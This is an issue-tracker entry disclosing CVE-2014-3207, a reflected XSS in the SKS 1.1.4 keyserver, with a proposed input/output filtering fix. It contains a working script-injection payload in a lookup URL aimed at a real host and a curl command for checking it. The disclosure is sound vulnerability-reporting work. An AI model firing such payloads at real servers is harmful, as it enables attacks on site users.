Issue #26 resolved

CVE-2014-3207: Unfiltered XSS

Anonymous created an issue

SKS 1.1.4 does not filter: /pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>

For example:

http://gpg.mozilla.org/pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>;

Note that recent browsers will urlencode this for you, thus the XSS only affects older browsers. You can verify this using curl, for example:

curl http://gpg.mozilla.org//pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>;

Proposed fix: Filter input/output (or do not display the input at all).

Initial report and findings: https://bugzilla.mozilla.org/show_bug.cgi?id=952077 by Haris (whitehat@hotmail.rs)

Comments (7)

  1. Log in to comment